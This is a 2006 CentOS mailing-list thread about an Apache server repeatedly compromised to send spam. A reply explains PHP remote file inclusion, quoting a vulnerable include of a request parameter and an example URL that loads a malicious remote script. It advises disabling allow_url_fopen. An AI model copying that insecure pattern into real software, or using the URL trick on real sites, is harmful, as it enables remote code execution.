Re: [CentOS] Apache Security

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] 

On Thursday 22 June 2006 13:16, Nicolas Ross wrote:
> > Hello, I have a server running CentOS 4.3 with all the latest updates.
> > The server in question has been hacked by spammers a few times.  The
> > details of the hack have been basically the same every time.  I find some
> > directory created by the apache user account in /tmp.  The new directory
> > contains an html file, and a list of email addresses to spam and a perl
> > script that spams all those email addresses with the html file.
> >
> > My question is why is this happening?  Obviously it's some apache
> > exploit. I have removed mod_perl, that didn't help.  I have now changed
> > the permissions on the perl executable, that might help we will see, but
> > that doesn't address the core problem.  How is it that someone can upload
> > arbitrary files to my server and then execute an arbitrary command via
> > apache.
> >
> > Is this a know problem?  Have others seen it?  What can I do to help
> > prevent this?
>
> I've also been hacked a couple of times with this sort of exploits. In my
> case, il was an exploit in awstats, a weblog analyser. If you have it, I
> strongly suggest you get up to the latest version...
>
> Also, if you have php scripts installed, they are a frequent source of
> security holes.s
>
> Nicolas
>
> _______________________________________________
> CentOS mailing list
> CentOS@xxxxxxxxxx
> http://lists.centos.org/mailman/listinfo/centos

All the hacks i've seen on my webservers were a combination of bad programming 
in php scripts and allow_url_fopen.

i've seen things like

else {
    include  $_REQUEST["param"]; 
}

so one could simply modify a url
http://example.com/bad-script.php?param=http://link.to.a.malicious.script/script.php
>From there you can put any local exploit code in script.php.

Disabling the allow_url_fopen will help you secure this a bit.

Just check your apache logs you should be able to find interesting information
in there.

I've seen this quite few times.
I hope this can help someone.

 
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos
[Index of Archives]     [CentOS]     [CentOS Announce]     [CentOS Development]     [CentOS ARM Devel]     [CentOS Docs]     [CentOS Virtualization]     [Carrier Grade Linux]     [Linux Media]     [Asterisk]     [DCCP]     [Netdev]     [Xorg]     [Linux USB]
  Powered by Linux